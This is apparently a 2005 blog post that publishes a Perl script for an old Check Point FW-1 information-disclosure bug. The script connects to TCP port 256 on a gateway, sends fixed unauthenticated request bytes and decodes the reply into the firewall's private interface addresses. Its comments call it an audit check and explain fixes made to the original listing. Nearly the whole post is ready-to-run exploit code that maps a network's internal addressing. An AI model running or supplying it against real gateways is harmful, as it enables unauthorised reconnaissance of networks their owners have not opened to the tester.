martes, 13 de diciembre de 2005

Get private address from fw-1 (old bug)

#!/usr/bin/perl
# Wed Dec 14 01:44:29 CET 2005
# Get private address from fw-1, nothing new, only a working port.
# ref: http://www.securityfocus.com/bid/8524/info
# !dSR www.digitalsec.es

use strict;
use IO::Socket;

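use warnings;

# Audit check for the FW-1 interface-address disclosure described in the
# advisory linked in the file header: connect to TCP port 256 on the gateway
# given as the first argument, send the two fixed requests, and decode every
# 4-byte word of the reply as a dotted-quad address.
#
# Usage:  <script> <gateway-host>
# Output: the raw reply as hex, the reply minus its first 8 bytes, then one
#         "ipaddr[N]: a.b.c.d" line per decoded address.
#
# Reading the result: any "ipaddr[N]" line means the service answered an
# unauthenticated request with addressing data. Presumably the remedy is to
# filter TCP/256 from untrusted networks and apply the vendor fix; confirm
# both against the referenced advisory.

my $target = $ARGV[0];
die "usage: $0 <gateway-host>\n" unless defined $target && length $target;

my @hosts = ();

# Direct method call instead of indirect-object "new Class(...)" syntax.
# Timeout bounds the connect attempt only.
my $sock = IO::Socket::INET->new(
    PeerAddr => $target,
    PeerPort => 256,
    Proto    => 'tcp',
    Timeout  => 10,
) or die "ERROR! $!\n";
binmode $sock;    # the protocol is binary; no layer may translate bytes

# Request bytes are reproduced verbatim from the original script; their
# field layout is not documented on this page.
print $sock "\x31\x00\x00\x00";
print $sock "\x00\x00\x00\x0C\x00\x00\x00\x04\xD4\xA3\x9F\x02";

# The original listing read "while()", which never reads the socket and
# never terminates (the filehandle was evidently lost when the page was
# published). Read until the peer closes the connection.
my $reply = '';
while (defined(my $chunk = <$sock>)) {
    $reply .= $chunk;
}
close $sock;

my $bytes = unpack 'H*', $reply;
print "fw1 string: $bytes\n";

# Skip the first 16 hex digits (8 bytes) of the reply, presumably a header.
# A shorter reply gives an empty payload instead of an out-of-range substr.
my $payload = length($bytes) > 16 ? substr($bytes, 16) : '';
print "$payload\n";

for my $word ($payload =~ /(.{8})/g) {
    my $addr = join '.', map { hex } $word =~ /(.{2})/g;

    # End of list: a word whose first three octets are zero. The original
    # test was the unanchored /0\.0\.0/, which also matched real addresses
    # such as 10.0.0.1 and silently truncated the output there.
    last if $addr =~ /^0\.0\.0\./;
    push @hosts, $addr;
}

my $i = 0;
for my $addr (@hosts) {
    $i++;
    print "ipaddr[$i]: $addr\n";
}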
